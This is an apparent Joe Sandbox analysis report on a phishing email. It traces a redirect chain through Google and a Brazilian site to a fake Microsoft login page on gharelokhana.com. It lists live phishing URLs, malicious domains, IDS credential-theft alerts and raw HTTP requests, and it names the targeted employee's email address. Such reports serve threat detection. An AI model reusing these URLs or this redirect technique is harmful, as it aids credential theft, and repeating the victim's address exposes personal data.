Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SBO Catch up call pf.msg

Overview

General Information

Sample name:SBO Catch up call pf.msg
Analysis ID:1568924
MD5:bd740fc68ab10ecc286c63e6fa4a9ce3
SHA1:dc5c39e880e5ee89ad784772f85105e52a8da46c
SHA256:430e8044df3b93d16dc5f9b2cd6b437e52b9bb5cd2356e4c07574a1af3d98d29
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish54
AI detected landing page (webpage, office document or email)
AI detected potential phishing Email
AI detected suspicious Javascript
Detected hidden input values containing email addresses (often used in phishing pages)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • OUTLOOK.EXE (PID: 5604 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\SBO Catch up call pf.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6148 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "70B31B44-41D0-4A8A-9A35-9C4EDE4E08A3" "394EF357-1A0B-4E1A-BBCB-9F7F5C0CEAAD" "5604" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,7133077948100089436,13748270433531493616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.3.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    1.10.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        3.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 2 entries
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5604, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T08:24:30.572131+010028570901Successful Credential Theft Detected164.92.191.86443192.168.2.849739TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icoAvira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/5bf3911d69954dcc9f26274a1117b6fd/Avira URL Cloud: Label: malware
            Source: https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.jsAvira URL Cloud: Label: malware
            Source: https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspxAvira URL Cloud: Label: malware
            Source: https://5088df79-5bf3911d.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=8d97587d-1931-4a24-9948-0d928dffd68c&_=1733383491884Avira URL Cloud: Label: malware
            Source: https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gifAvira URL Cloud: Label: malware
            Source: https://l1ve.gharelokhana.com/Me.htm?v=3Avira URL Cloud: Label: malware
            Source: https://82ce8558-5bf3911d.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.jsAvira URL Cloud: Label: malware
            Source: https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgAvira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatusAvira URL Cloud: Label: malware
            Source: https://e7a91062-5bf3911d.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jsAvira URL Cloud: Label: malware
            Source: https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgAvira URL Cloud: Label: malware

            Phishing

            barindex
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'djdjkdlellekkff.gharelokhana.com' does not match the legitimate domain 'microsoft.com'., The domain 'gharelokhana.com' is not associated with Microsoft., The subdomain 'djdjkdlellekkff' appears random and suspicious., The presence of a well-known brand name with an unrelated domain is a common phishing tactic. DOM: 3.7.pages.csv
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'djdjkdlellekkff.gharelokhana.com' does not match the legitimate domain 'microsoft.com'., The domain 'gharelokhana.com' is unrelated to Microsoft and appears suspicious., The subdomain 'djdjkdlellekkff' is nonsensical and adds to the suspicion., The email domain 'sbo.co.at' is unrelated to Microsoft, which could indicate a phishing attempt. DOM: 3.8.pages.csv
            Source: Yara matchFile source: 1.3.id.script.csv, type: HTML
            Source: Yara matchFile source: 1.10.id.script.csv, type: HTML
            Source: Yara matchFile source: 2.2.pages.csv, type: HTML
            Source: Yara matchFile source: 3.3.pages.csv, type: HTML
            Source: Yara matchFile source: 3.5.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 3.8.pages.csv, type: HTML
            Source: EmailJoe Sandbox AI: Email contains prominent button: 'listen'
            Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'culbertsplumbing.com' doesn't match the claimed Fujipharma business context. Multiple suspicious encoded/obfuscated URLs including a suspicious Google redirect to '.dz' domain. Multiple identical PDF attachments with non-descriptive names suggest malicious intent
            Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... This code shows multiple high-risk indicators: heavy obfuscation (array-based encoding), suspicious string patterns (including ad-related selectors and tracking elements), and potential DOM manipulation capabilities. The code appears to be deliberately obscured to hide its true functionality, which is a common malware technique.
            Source: 1.8.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... This code shows multiple high-risk indicators: heavy obfuscation (encoded strings, numeric hex values), complex control flow obfuscation (nested functions, conditional logic), and use of dynamic array manipulation. The code appears to be intentionally obscured to hide its true functionality, which is a common malware technique.
            Source: 1.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... High-risk indicators present: Script uses suspicious domains (gharelokhana.com) masquerading as Microsoft login, contains obfuscated/encoded strings, and appears to be a sophisticated phishing attempt collecting login credentials. Multiple suspicious endpoints for data collection and unusual domain patterns indicate malicious intent.
            Source: 1.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... High-risk script showing multiple red flags: 1) Suspicious redirect URLs to 'gharelokhana.com' which appears to be impersonating a legitimate service 2) OAuth flow manipulation attempting to capture authentication credentials 3) Complex URL encoding to obscure malicious parameters 4) Multiple suspicious domains used as fallbacks. This appears to be a sophisticated phishing attempt.
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: klaus.mader@sbo.co.at
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AHTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 88px; height: 31px; overflow: hidden; position: relative;"]
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
            Source: EmailClassification: Invoice Scam
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.92.191.86:443 -> 192.168.2.8:49739
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.dz to https://alvoradavisual.com.br/yoya/cjbh/a2xhdxmubwfkzxjac2jvlmnvlmf0$$$
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1Host: linkprotect.cudasvc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=XLauBolikN8BvpO6I94MfjjYrrc1I2vuKBeoFz4JwYCDpIAGHZr8E1dgQI4LBPJ-6O5XgjO_ZunkkZ8urlfPDzEznulx5_nu1vDHQ-TLJvT-m0xlD4v95igolfBrd2Ti4um52EBdiK-f8HKhG22KVw8g7Bo2crY6B0D0VdPzzUBvE7vIJHEDJCIlT6U0UVfiPaDc
            Source: global trafficHTTP traffic detected: GET /yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: alvoradavisual.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: alvoradavisual.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://alvoradavisual.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
